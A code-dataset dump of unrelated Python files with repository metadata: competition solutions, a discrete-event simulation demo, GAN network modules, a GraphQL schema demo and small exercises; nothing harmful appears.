] | thomas.warfel@pnnl.gov |
dc95b43f050b1a562cd5b337aa8b009fa051bb29 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_43/223.py | e3f471696da9db5f1e2d23a13dbcff77e5f7668f | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,509 | py | #!/usr/bin/python
import os
import sys
import math
def read_input_NN(fn =""):
fh = open(fn, "r")
lines = map(lambda x: x.strip(), fh.readlines())
fh.close()
goog_N = map(int, lines[0].split())[0]
l_dict = lines[1:]
return(l_dict)
def sum_square(str1="123"):
sum1 = 0
for i in str1:
sum1 += int(i)*int(i)
return(sum1)
def tobase(base, number):
    """Return `number` written in `base` as a string of decimal digit chunks.

    Digit values >= 10 are emitted as their decimal representation (so
    tobase(16, 255) == "1515"), matching the original recursive helper.
    Negative numbers get a leading '-'; zero is "0".

    Raises:
        TypeError: if base or number is not an int (same as the original,
            which used the Python-2-only ``raise X, msg`` syntax).
        ValueError: if base <= 0.

    The original bound a recursive helper via ``global tb`` (polluting the
    module namespace) and used ``n/b``, which is float division on Python 3;
    this iterative version uses divmod and needs no helper.
    """
    if type(base) is not int:
        raise TypeError('invalid base for tobase()')
    if base <= 0:
        raise ValueError('invalid base for tobase(): %s' % base)
    if type(number) is not int:
        raise TypeError('tobase() of non-integer')
    if number == 0:
        return '0'
    sign = '-' if number < 0 else ''
    n = abs(number)
    digits = []
    while n:
        n, rem = divmod(n, base)
        digits.append(str(rem))
    return sign + ''.join(reversed(digits))
def determine_happy(base1 = 10,num1 = "83"):
last_num="0"
d_found = {}
num1 = tobase(base1,int(num1))
#print num1
while(num1!="1"):
num1 = tobase(base1,sum_square(num1))
#print num1
if last_num == num1:
break
if num1 == "1":
break
last_num = num1
if num1 in d_found.keys():
break
d_found[num1]=1
if num1 == "1":
return(1)
return(0)
def find_smallest(l2=[1, 2, 3]):
    """Return the smallest integer >= 2 that is happy in every base in l2.

    Base 2 is discarded first because every positive integer is happy in
    base 2, so it never constrains the answer; if no other base remains,
    1 is returned.  If nothing is found below 1,000,000 the last candidate
    is returned (as in the original).

    Fixes: the original used ``xrange`` and indexed/len'd the result of
    ``filter`` -- both Python-2-only -- and kept an unused local ``i_s``.
    (The mutable default list is retained for interface compatibility; it
    is never mutated, only rebound.)
    """
    bases = [b for b in l2 if b != 2]
    if not bases:
        return 1
    candidate = 1
    for i in range(2, 1000000):
        candidate = i
        # determine_happy returns 1/0, so all() matches the original
        # "product of flags equals 1" check.
        if all(determine_happy(b, str(i)) for b in bases):
            break
    return candidate
def small_base(str1="123"):
l2 = list(str1)
#print l2
set1 = set(l2)
d_map={}
dec_list = [1,0]+range(2,100)
dec_i = 0
for i in l2:
if i not in d_map.keys():
d_map[i]=dec_list[dec_i]
dec_i+=1
#print d_map
l2 = map(lambda x: d_map[x],l2)
#print l2
base1 = max([2,len(set1)])
#print base1
num1 = 0
for (ctr,i) in enumerate(l2[::-1]):
num1+=math.pow(base1,ctr)*i
return(num1)
def qa(fn="sample"):
l1 = read_input_NN(fn)
#print l1
return(l1)
#l1 = qa(fn="A-large.in.txt")
l1 = qa(fn="A-small-attempt0-1.in.txt")
#print l1
fh = open("out.txt","w")
for (ctr,sol) in enumerate(l1):
print >> fh, "Case #"+str(ctr+1)+": "+str(int(small_base(sol)+.001))
#print small_base(sol)
fh.close()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
aceb95c7fc2ae2e177bc60e8453b07a43eacbd83 | 2871a5c3d1e885ee72332dbd8ff2c015dbcb1200 | /o2despy/demos/demo2/demo2.py | 46c6865ce1c61201973f24e6aaf3a88ccd687044 | [
"MIT"
] | permissive | huawei-noah/noah-research | 297476299ad040552e44656541858145de72d141 | 82c49c36b76987a46dec8479793f7cf0150839c6 | refs/heads/master | 2023-08-16T19:29:25.439701 | 2023-08-14T03:11:49 | 2023-08-14T03:11:49 | 272,853,727 | 816 | 171 | null | 2023-09-12T01:28:36 | 2020-06-17T01:53:20 | Python | UTF-8 | Python | false | false | 2,379 | py | # Copyright (C) 2022. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import datetime
import random
from datetime import timedelta
from o2despy.sandbox import Sandbox
class BirthDeath(Sandbox):
    """Birth-death process simulated on top of the o2despy Sandbox.

    Births arrive as a Poisson process with rate `hourly_birth_rate`; each
    birth schedules the corresponding death after an exponential lifetime
    with rate `hourly_death_rate`.  `population` is an hour-counter that
    tracks the current population level.
    """
    def __init__(self, hourly_birth_rate, hourly_death_rate, seed=0):
        super().__init__(seed=seed)
        self.hourly_birth_rate = hourly_birth_rate
        self.hourly_death_rate = hourly_death_rate
        self.population = self.add_hour_counter()
        # NOTE(review): inter-event times use the module-level `random`
        # generator, not an RNG derived from `seed` -- confirm that
        # Sandbox(seed=...) seeds `random`, otherwise runs are not
        # reproducible via the seed argument.
        # self.schedule([self.birth], timedelta(seconds=0))
        self.schedule([self.birth])
    def birth(self):
        """Record one birth, then schedule the next birth and this
        individual's death at exponentially distributed delays."""
        self.population.observe_change(1)
        print("{0}\tBirth (Population: #{1}!)".format(self.clock_time, self.population.last_count))
        self.schedule([self.birth], timedelta(hours=round(random.expovariate(self.hourly_birth_rate), 2)))
        self.schedule([self.death], timedelta(hours=round(random.expovariate(self.hourly_death_rate), 2)))
    def death(self):
        """Record one death."""
        self.population.observe_change(-1)
        print("{0}\tDeath (Population: #{1}!)".format(self.clock_time, self.population.last_count))
if __name__ == '__main__':
    # Demo 2: run the birth-death process with 20 births/hour and a mean
    # lifetime of 1 hour, discarding the first 24 simulated hours as warmup
    # before collecting 30 hours of output.
    print("Demo 2 - Birth Death Process")
    sim = BirthDeath(20, 1, seed=1)
    sim.warmup(period=datetime.timedelta(hours=24))
    sim.run(duration=datetime.timedelta(hours=30))
| [
"noreply@github.com"
] | huawei-noah.noreply@github.com |
68d4ffaec3b27b725bd05a50989f1f215328c4b8 | 5f69a6549b8d5e417553d910622e6855b2ae679b | /projects/python/simulation/synthetic_multi_view_facial_image_generation/algorithm/Rotate_and_Render/models/networks/architecture.py | 123004ef5239c4420d42105dbf720eb77c14adc4 | [
"Apache-2.0",
"CC-BY-4.0",
"MIT"
] | permissive | opendr-eu/opendr | 822219f709613d77c5eb62c5d02808d344239835 | b3d6ce670cdf63469fc5766630eb295d67b3d788 | refs/heads/master | 2023-08-31T07:02:36.375231 | 2023-08-29T06:39:51 | 2023-08-29T06:39:51 | 293,755,225 | 535 | 82 | Apache-2.0 | 2023-09-13T16:53:34 | 2020-09-08T08:55:04 | Python | UTF-8 | Python | false | false | 7,410 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torch.nn.utils.spectral_norm as spectral_norm
from .normalization import SPADE
from ...util import util
# ResNet block that uses SPADE.
# It differs from the ResNet block of pix2pixHD in that
# it takes in the segmentation map as input, learns the skip connection if necessary,
# and applies normalization first and then convolution.
# This architecture seemed like a standard architecture for unconditional or
# class-conditional GAN architecture using residual block.
# The code was inspired from https://github.com/LMescheder/GAN_stability.
class SPADEResnetBlock(nn.Module):
    """Residual block whose normalization layers are SPADE, i.e. they are
    modulated by a semantic segmentation map `seg` passed alongside `x`.

    A learned 1x1 shortcut is added when input/output channel counts differ.
    NOTE(review): `_forward` (norm -> act -> conv, the ordering used in the
    SPADE paper) appears to be dead code -- only `forward` (conv -> norm ->
    act) is invoked by PyTorch. The shortcut ordering also differs between
    the two paths (`shortcut()` is conv(norm(x)); `forward` uses
    norm(conv(x))). Confirm which ordering is intended before refactoring.
    """
    def __init__(self, fin, fout, opt):
        super().__init__()
        # Attributes
        self.learned_shortcut = (fin != fout)
        fmiddle = min(fin, fout)
        # create conv layers
        self.conv_0 = nn.Conv2d(fin, fmiddle, kernel_size=3, padding=1)
        self.conv_1 = nn.Conv2d(fmiddle, fout, kernel_size=3, padding=1)
        if self.learned_shortcut:
            self.conv_s = nn.Conv2d(fin, fout, kernel_size=1, bias=False)
        # apply spectral norm if specified (opt.norm_G e.g. 'spectralspadesyncbatch3x3')
        if 'spectral' in opt.norm_G:
            self.conv_0 = spectral_norm(self.conv_0)
            self.conv_1 = spectral_norm(self.conv_1)
            if self.learned_shortcut:
                self.conv_s = spectral_norm(self.conv_s)
        # define normalization layers; SPADE parses the config string with
        # the 'spectral' prefix stripped
        spade_config_str = opt.norm_G.replace('spectral', '')
        self.norm_0 = SPADE(spade_config_str, fmiddle, opt.semantic_nc)
        self.norm_1 = SPADE(spade_config_str, fout, opt.semantic_nc)
        if self.learned_shortcut:
            self.norm_s = SPADE(spade_config_str, fout, opt.semantic_nc)
    # note the resnet block with SPADE also takes in |seg|,
    # the semantic segmentation map as input
    def _forward(self, x, seg):
        # Unused alternative path: SPADE-normalize first, then convolve.
        x_s = self.shortcut(x, seg)
        dx = self.conv_0(self.actvn(self.norm_0(x, seg)))
        dx = self.conv_1(self.actvn(self.norm_1(dx, seg)))
        out = x_s + dx
        return out
    def forward(self, x, seg):
        # Active path: convolve first, then SPADE-normalize and activate.
        if self.learned_shortcut:
            x_s = self.norm_s(self.conv_s(x), seg)
        else:
            x_s = x
        dx = self.actvn(self.norm_0(self.conv_0(x), seg))
        dx = self.actvn(self.norm_1(self.conv_1(dx), seg))
        out = x_s + dx
        return out
    def shortcut(self, x, seg):
        # Shortcut used only by the dead `_forward` path (norm before conv).
        if self.learned_shortcut:
            x_s = self.conv_s(self.norm_s(x, seg))
        else:
            x_s = x
        return x_s
    def actvn(self, x):
        return F.leaky_relu(x, 2e-1)
# try to put SPADE into pix2pixHD middle layers
class ResnetSPADEBlock(nn.Module):
    """pix2pixHD-style residual block with SPADE normalization spliced in.

    Channel count is preserved; reflection padding keeps spatial size.
    NOTE(review): spectral_norm() wraps conv_0/conv_1 in place, and
    add_module then registers the *same* modules again under
    'conv_block1'/'conv_block4', duplicating their entries in the
    state_dict. This looks accidental (compare SPADEResnetBlock, which
    simply reassigns) but fixing it would change checkpoint keys -- confirm
    before changing.
    """
    def __init__(self, dim, semantic_nc, kernel_size=3):
        super().__init__()
        norm_G = 'spectralspadesyncbatch3x3'  # hard-coded SPADE config
        pw = (kernel_size - 1) // 2
        self.conv_0 = nn.Conv2d(dim, dim, kernel_size=kernel_size)
        self.conv_1 = nn.Conv2d(dim, dim, kernel_size=kernel_size)
        self.padding = nn.ReflectionPad2d(pw)
        if 'spectral' in norm_G:
            self.add_module('conv_block1', spectral_norm(self.conv_0))
            self.add_module('conv_block4', spectral_norm(self.conv_1))
        # define normalization layers
        spade_config_str = norm_G.replace('spectral', '')
        self.norm_0 = SPADE(spade_config_str, dim, semantic_nc)
        self.norm_1 = SPADE(spade_config_str, dim, semantic_nc)
    def forward(self, x, seg):
        # pad -> conv -> SPADE -> leaky-relu, twice, plus identity shortcut.
        dx = self.padding(x)
        dx = self.activation(self.norm_0(self.conv_0(dx), seg))
        dx = self.padding(dx)
        dx = self.activation(self.norm_1(self.conv_1(dx), seg))
        out = x + dx
        return out
    def activation(self, x):
        return F.leaky_relu(x, 2e-1)
# ResNet block used in pix2pixHD
# We keep the same architecture as pix2pixHD.
class ResnetBlock(nn.Module):
    """Residual block as used in pix2pixHD: two reflection-padded 3x3
    convolutions (wrapped by `norm_layer`), each followed by `activation`,
    added to the identity shortcut.  Spatial size and channel count are
    preserved.  Note: unlike the stock pix2pixHD block, an activation is
    also applied after the second convolution.
    """
    def __init__(self, dim, norm_layer, activation=nn.ReLU(False), kernel_size=3):
        super().__init__()
        pad = (kernel_size - 1) // 2
        stages = [
            nn.ReflectionPad2d(pad),
            norm_layer(nn.Conv2d(dim, dim, kernel_size=kernel_size)),
            activation,
            nn.ReflectionPad2d(pad),
            norm_layer(nn.Conv2d(dim, dim, kernel_size=kernel_size)),
            activation,
        ]
        self.conv_block = nn.Sequential(*stages)
    def forward(self, x):
        return x + self.conv_block(x)
# VGG architecter, used for the perceptual loss using a pretrained VGG network
class VGG19(torch.nn.Module):
    """Pretrained VGG19 feature extractor split into five stages
    (slice1..slice5), used for the perceptual loss.  forward() returns the
    activations after each stage.  With requires_grad=False (the default)
    all parameters are frozen.
    """
    # Layer-index boundaries of the five stages within vgg19().features.
    _STAGE_BOUNDS = [(0, 2), (2, 7), (7, 12), (12, 21), (21, 30)]
    def __init__(self, requires_grad=False):
        super(VGG19, self).__init__()
        features = torchvision.models.vgg19(pretrained=True).features
        for stage_num, (start, stop) in enumerate(self._STAGE_BOUNDS, start=1):
            stage = torch.nn.Sequential()
            for layer_idx in range(start, stop):
                stage.add_module(str(layer_idx), features[layer_idx])
            setattr(self, 'slice%d' % stage_num, stage)
        if not requires_grad:
            for param in self.parameters():
                param.requires_grad = False
    def forward(self, X):
        out = []
        h = X
        for stage_num in range(1, 6):
            h = getattr(self, 'slice%d' % stage_num)(h)
            out.append(h)
        return out
class VGGFace19(torch.nn.Module):
    """VGG19-BN feature extractor initialized from a VGGFace checkpoint
    (opt.vggface_checkpoint), split into five stages like VGG19 and used
    for an identity-aware perceptual loss.

    NOTE(review): the slice boundaries (0-2, 2-7, 7-12, 12-21, 21-30) are
    the same indices as in plain VGG19 above, but vgg19_bn interleaves
    BatchNorm layers so these indices land on different layers here --
    confirm the stage boundaries are intentional.
    """
    def __init__(self, opt, requires_grad=False):
        super(VGGFace19, self).__init__()
        model = torchvision.models.vgg19_bn(pretrained=False)
        # Load VGGFace weights; keys in the checkpoint are prefixed with
        # 'module.base.' which util.copy_state_dict strips.
        ckpt = torch.load(opt.vggface_checkpoint)['state_dict']
        util.copy_state_dict(ckpt, model, 'module.base.')
        vgg_pretrained_features = model.features
        self.slice1 = torch.nn.Sequential()
        self.slice2 = torch.nn.Sequential()
        self.slice3 = torch.nn.Sequential()
        self.slice4 = torch.nn.Sequential()
        self.slice5 = torch.nn.Sequential()
        for x in range(2):
            self.slice1.add_module(str(x), vgg_pretrained_features[x])
        for x in range(2, 7):
            self.slice2.add_module(str(x), vgg_pretrained_features[x])
        for x in range(7, 12):
            self.slice3.add_module(str(x), vgg_pretrained_features[x])
        for x in range(12, 21):
            self.slice4.add_module(str(x), vgg_pretrained_features[x])
        for x in range(21, 30):
            self.slice5.add_module(str(x), vgg_pretrained_features[x])
        if not requires_grad:
            for param in self.parameters():
                param.requires_grad = False
    def forward(self, X):
        # Return the activation after each of the five stages.
        h_relu1 = self.slice1(X)
        h_relu2 = self.slice2(h_relu1)
        h_relu3 = self.slice3(h_relu2)
        h_relu4 = self.slice4(h_relu3)
        h_relu5 = self.slice5(h_relu4)
        out = [h_relu1, h_relu2, h_relu3, h_relu4, h_relu5]
        return out
| [
"noreply@github.com"
] | opendr-eu.noreply@github.com |
726f81a2bbf5d4b11fa85cab9560e8742992fb7b | a0e895ec31d4b376c50e203b7a9c018c288d3287 | /hw2/random_sample_predict.py | ec22bad40ae53aa43ff9832041f1914c7f47e3ff | [] | no_license | eiahb3838ya/2018_ntu_machine_learning | 43c3885c6175c0f753d9597732b59986234c8360 | 256cfa806dc403dcc1b5eb51317cf4972de28787 | refs/heads/master | 2020-04-17T16:32:17.417827 | 2019-01-21T03:54:43 | 2019-01-21T03:54:43 | 166,744,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,117 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 25 15:50:15 2018
@author: eiahb
"""
#import scipy,pprint
#from pprint import pprint
import numpy as np
import pandas as pd
#import matplotlib.pyplot as plt
#from sklearn.metrics import log_loss
#import datetime
from my_class.common_function import *
from imblearn.over_sampling import SMOTE, ADASYN,RandomOverSampler
# Train/continue a logistic-regression classifier (homework 2) starting from
# previously saved weights, then write predictions for the test set.
TRAIN_NUM=11  # run identifier used to tag checkpoints/predictions
mylog=init_logging()
# Resume from the weights/bias saved by a previous run of this script.
w_init=np.load("temp_W_b/lr_W_chanel2.npy")
b_init=np.load("temp_W_b/lr_b_chanel2.npy")
#load prework of train_x
raw_train_x=pd.read_csv("train_x.csv",encoding="big5")
train_x=prework_x(raw_train_x)
#load prework of train_y
raw_train_y=pd.read_csv("train_y.csv",encoding="big5")
train_y=raw_train_y
#load prework of test_x
raw_test_x=pd.read_csv("test_x.csv",encoding="big5")
test_x=prework_x(raw_test_x)
#reshape to fit model
train_x_np=np.array(train_x)
train_y_np=np.array(train_y)#.reshape(-1,)
test_x_np=np.array(test_x)
print("shape of train_x,test_x,train_y_np:",train_x_np.shape,test_x_np.shape,train_y_np.shape)
#resampling (disabled experiment: SMOTE oversampling of the minority class)
#x_resampled, y_resampled = SMOTE().fit_resample(train_x_np, train_y_np)
#print("shape of X_resampled,y_resampled:",x_resampled.shape,y_resampled.shape)
#train_x=x_resampled.reshape(-1,train_x_np.shape[1])
#train_y=y_resampled.reshape(-1,1)
#print("shape of train_x,train_y:",train_x.shape,train_y.shape)
lr=Logistic_Regression_gradient()
lr.train(train_x_np,train_y_np,train_num=TRAIN_NUM,w_init=w_init,b_init=b_init,epochs=5000000,batch_size=120)
mylog.info("training done")
# Scale test features with the statistics learned during training, predict,
# and persist the updated weights for the next resumed run.
test_x_scaled=lr.feature_scaling(test_x_np)
lr.predict(test_x_scaled,train_num=TRAIN_NUM,result=True)
np.save("temp_W_b/lr_W_chanel2.npy",lr.W,)
np.save("temp_W_b/lr_b_chanel2.npy",lr.b,)
#last_W=lr.W
#last_b=lr.b
#mylog.debug("start train #"+str(TRAIN_NUM))
#lr.train(train_x_np,train_y_np,w_init=last_W,b_init=last_b,train_num=TRAIN_NUM,epochs=500000)
#test_x=lr.feature_scaling(test_x)
#last_W=lr.W
#last_b=lr.b
#lr.predict(test_x,result=True,train_num=TRAIN_NUM)
#W = np.zeros((train_x.shape[1], 1))
#np.dot(train_x,W)
#sigmoid_v = np.vectorize(sigmoid)
#sigmoid_v(np.dot(train_x,W))
| [
"eiahb3838ya@gmail.com"
] | eiahb3838ya@gmail.com |
6616f04e1e77a286e4ed8db783e1a8baec073a2c | c008898bf1adbba7110e0747343adbb3b01fc6c1 | /schema.py | e9c598f65df574c60c7bc23db3b509a9ea51aa43 | [] | no_license | gloompi/python-graphql | 45368fb3130dfc7d5e38614c59e638bb713706ee | 29ca5859027029f625196d13e232d3337f64ca36 | refs/heads/master | 2022-12-15T19:22:51.001813 | 2019-06-28T07:53:25 | 2019-06-28T07:53:25 | 194,230,911 | 0 | 0 | null | 2022-12-10T01:36:39 | 2019-06-28T07:46:37 | Python | UTF-8 | Python | false | false | 2,127 | py | import graphene
import json
import uuid
from datetime import datetime
class Post(graphene.ObjectType):
    # GraphQL type for a post: a title plus its body text.
    title = graphene.String()
    content = graphene.String()
class User(graphene.ObjectType):
    # GraphQL user type.
    # NOTE(review): both default_value expressions run once, at
    # class-definition time, so every User relying on the defaults shares
    # the same UUID and the same timestamp — confirm this is intended.
    id = graphene.ID(default_value=str(uuid.uuid4()))
    username = graphene.String()
    created_at = graphene.DateTime(default_value=datetime.now())
    avatar_url = graphene.String()
    def resolve_avatar_url(self, info):
        # Derived field: build the avatar URL from username and id.
        return f'https://cloudinary.com/{self.username}/{self.id}'
class Query(graphene.ObjectType):
    # Root query type: exposes the users list plus two scalar demo fields.
    users = graphene.List(User, limit=graphene.Int())
    hello = graphene.String()
    is_admin = graphene.Boolean()

    def resolve_hello(self, info):
        # Fixed greeting payload for the `hello` field.
        return 'world'

    def resolve_is_admin(self, info):
        # Hard-coded flag for the `is_admin` field.
        return True

    def resolve_users(self, info, limit=None):
        # Build the demo users from a name table; limit=None slices to all.
        names = ("Kuba", "Tina", "Tiger")
        all_users = [
            User(id=str(idx), username=name, created_at=datetime.now())
            for idx, name in enumerate(names, start=1)
        ]
        return all_users[:limit]
class CreateUser(graphene.Mutation):
    # Mutation payload: the newly created user.
    user = graphene.Field(User)

    class Arguments:
        username = graphene.String()

    def mutate(self, info, username):
        # Build the user and wrap it in the mutation result.
        new_user = User(username=username)
        return CreateUser(user=new_user)
class CreatePost(graphene.Mutation):
    # Mutation payload: the newly created post.
    post = graphene.Field(Post)

    class Arguments:
        title = graphene.String()
        content = graphene.String()

    def mutate(self, info, title, content):
        # Anonymous callers may not create posts.
        if info.context.get('is_anonymus'):
            raise Exception('Not authenticated')
        new_post = Post(title=title, content=content)
        return CreatePost(post=new_post)
class Mutation(graphene.ObjectType):
    # Root mutation type wiring up the two mutations.
    create_user = CreateUser.Field()
    create_post = CreatePost.Field()
schema = graphene.Schema(query=Query, mutation=Mutation)
result = schema.execute(
'''
{
users {
id
createdAt
username
avatarUrl
}
}
''',
# context={ 'is_anonymus': True }
# variable_values={'limit': 2}
)
print('ERROR', result.errors)
dictResult = dict(result.data.items())
print(json.dumps(dictResult, indent=2))
| [
"gloompi@gmail.com"
] | gloompi@gmail.com |
d869097b1775e96d604c69bdde7348b1eb27b9c8 | ec35df4cc4543f20bd6a1d30f244f67873ecd261 | /045.py | ef73f81e6668900eb23328f490879352303165db | [] | no_license | timsergor/StillPython | 02b6ddc3226cf8d27d8575ca36e75a19cfe6ac9d | 84b3b37bc165b9daf83cca78d577b5a927e483ec | refs/heads/master | 2020-05-24T09:34:14.819413 | 2020-04-19T13:35:06 | 2020-04-19T13:35:06 | 187,209,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | #202. Happy Number. Easy. 46%.
#Write an algorithm to determine if a number is "happy".
#A happy number is a number defined by the following process: Starting with any positive integer, replace the number by the sum of the squares of its digits, and repeat the process until the number equals 1 (where it will stay), or it loops endlessly in a cycle which does not include 1. Those numbers for which this process ends in 1 are happy numbers.
class Solution:
    def isHappy(self, n: int) -> bool:
        """Return True if *n* is a happy number.

        Repeatedly replace n with the sum of the squares of its decimal
        digits; happy numbers reach 1, unhappy ones fall into a cycle.
        """
        def digit_square_sum(m: int) -> int:
            # Sum of squared decimal digits of m (renamed from `next`,
            # which shadowed the builtin of the same name).
            total = 0
            while m > 0:
                total += (m % 10) ** 2
                m //= 10
            return total

        seen = set()  # a repeat here means we are cycling, never reaching 1
        while n != 1:
            if n in seen:
                return False
            seen.add(n)
            n = digit_square_sum(n)
        return True
# 15min
| [
"noreply@github.com"
] | timsergor.noreply@github.com |
a78d1316c681b645f01cafd9966a4bb424491802 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03660/s310524772.py | 3b5afbbf4eb0c248015cdabad9bc34a06be65a3e | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 956 | py | N=int(input())
# Fennec-vs-Snuke territory game on a tree of N cells (AtCoder ABC 067 D style).
# Build the adjacency list from the N-1 edges (converted to 0-based ids).
E=[[] for i in range(N)]
for i in range(N-1):
    x,y=map(int,input().split())
    x-=1
    y-=1
    E[x].append(y)
    E[y].append(x)
from collections import deque
# Depth-first traversal from vertex 0, recording each vertex's predecessor.
BACK=[-1]*N
Q=deque([0])
while Q:
    x=Q.pop()
    for to in E[x]:
        if BACK[to]==-1:
            BACK[to]=x
            Q.append(to)
# Recover the unique path from vertex N-1 back to vertex 0 via BACK.
ROAD=[N-1]
while ROAD[-1]!=0:
    ROAD.append(BACK[ROAD[-1]])
LEN=len(ROAD)
# Colour the path: the half nearer N-1 gets 1 (seeds QB), the half nearer 0
# gets 0 (seeds QW); these seed the two flood fills below.
COLOR=[-1]*N
QW=deque()
QB=deque()
for i in range(LEN//2):
    COLOR[ROAD[i]]=1
    QB.append(ROAD[i])
for i in range(LEN//2,LEN):
    COLOR[ROAD[i]]=0
    QW.append(ROAD[i])
# SW/SB count extra cells claimed off the path; an odd-length path leaves one
# unmatched path cell, which the code credits to SW.
SW=0
if LEN%2==1:
    SW+=1
SB=0
# Flood-fill the remaining (uncoloured) vertices from each seeded frontier.
while QW:
    x=QW.pop()
    for to in E[x]:
        if COLOR[to]==-1:
            COLOR[to]=0
            SW+=1
            QW.append(to)
while QB:
    x=QB.pop()
    for to in E[x]:
        if COLOR[to]==-1:
            COLOR[to]=1
            SB+=1
            QB.append(to)
# Fennec wins when her count beats Snuke's.
if SW>SB:
    print("Fennec")
else:
    print("Snuke")
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
81b8771788890aa2f6794dde1f7552b4c07a80cd | b9b06d86d43e738b62ab9289fc13aae4c2b2670b | /weekend1/py0102/for1.py | 1f39b536774af0ab4e720cc81ddfe41afd787886 | [] | no_license | MrZhangzhg/nsd_2018 | 31a7a8d54e2cb3ff4f4eb5c736fbd76601718356 | 458a1fef40c5e15ba7689fcb3a00baf893ac0218 | refs/heads/master | 2020-04-08T19:08:48.237646 | 2019-09-08T04:31:07 | 2019-09-08T04:31:07 | 159,642,127 | 5 | 7 | null | 2019-01-04T05:33:40 | 2018-11-29T09:37:27 | Python | UTF-8 | Python | false | false | 550 | py | astr = 'tom'
alist = [10, 20]
atuple = ('tom', 'jerry')
adict = {'name': 'tom', 'age': 20}
# for ch in astr:
#     print(ch)
#
# for i in alist:
#     print(i)
#
# for name in atuple:
#     print(name)
#
# for key in adict:
#     print(key, adict[key])
# The range function
print(range(10))
print(list(range(10)))
for i in range(10):
    print(i)
# With a single argument, range takes it as the stop value; the start
# defaults to 0, and the stop value itself is excluded.
print(list(range(6, 11)))
print(list(range(1, 11, 2)))  # 2 is the step size
print(list(range(10, 0, -1)))
| [
"zhangzg@tedu.cn"
] | zhangzg@tedu.cn |
4499443d25983a3ebaa681cf359a318a7170d7ea | 845d4102771a547dbc447f1d837b89a538f977b7 | /exerciciosComCondicionais/A_CONDICIONAIS/02A_EX12.py | 66f50bc2221fc6508059fec4ac2c14b7d8b00b06 | [] | no_license | TemistoclesZwang/Algoritmo_IFPI_2020 | 16e92d6f3e5e3f15ad573819cbd0171c5a5e3f5d | cc24657864985c3894ab738692807a01eab8d377 | refs/heads/main | 2023-08-23T02:57:58.838585 | 2021-10-05T16:18:14 | 2021-10-05T16:18:14 | 310,669,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | #12. Leia 1 (um) número inteiro e escreva se este número é par ou impar.
def main():
    # Ask the user for an integer and delegate the parity report.
    user_value = int(input('Insira um número: '))
    verificar(user_value)
def verificar(numero):
    # Report parity: 'É par' for even values, 'É impar' for odd ones.
    eh_par = int(numero) % 2 == 0
    if eh_par:
        print('É par')
    else:
        print('É impar')
if __name__ == '__main__':
    # Run only when executed as a script, not when imported as a module.
    main()
| [
"temis2st@gmail.com"
] | temis2st@gmail.com |
a10ee01a362b58ba412f342306b973b06d970f6e | 27e18001bd40f6fe5b9f675130e359147ce3519a | /6_new.py | 936df46dcbdf08994dfeb8336bdb4e3656c3f653 | [] | no_license | jsomers/project-euler | 6934a5d4eb2c116b08face308a010ddb74e0c123 | 61cc4cd7978deeed9d071f678c786f991e05d8a7 | refs/heads/master | 2021-01-01T05:39:39.568380 | 2014-08-21T04:05:10 | 2014-08-21T04:05:10 | 10,680,061 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 195 | py | # Find the difference between the sum of the squares of the first one hundred natural numbers and the square of the sum.
print abs(sum([n ** 2 for n in range(1, 101)]) - sum(range(1, 101)) ** 2) | [
"jsomers@gmail.com"
] | jsomers@gmail.com |
cc81acf8488b435b9d734ab2d59a92a548f10506 | d93fe0484fc3b32c8fd9b33cc66cfd636a148ec4 | /AtCoder/diverta2/probB.py | c411fbc5ebeedd84ebac25443fcf3e2e2ee760b5 | [] | no_license | wattaihei/ProgrammingContest | 0d34f42f60fa6693e04c933c978527ffaddceda7 | c26de8d42790651aaee56df0956e0b206d1cceb4 | refs/heads/master | 2023-04-22T19:43:43.394907 | 2021-05-02T13:05:21 | 2021-05-02T13:05:21 | 264,400,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 977 | py | from operator import itemgetter
import numpy as np
import scipy.stats as stats
# Read the N points and sort them (sorted twice: by y, then by x as the
# final, primary key).
N = int(input())
xy = [list(map(int, input().split())) for _ in range(N)]
xy = sorted(xy, key=itemgetter(1))
xy = sorted(xy, key=itemgetter(0))
print(xy)
xy_a = np.array(xy)
x1 = xy_a[:, 0]  # x coordinates, in sorted order
x2 = xy_a[:, 1]  # y coordinates
def calc_mode(xi):
    """Return the most frequent value(s) among consecutive differences of *xi*.

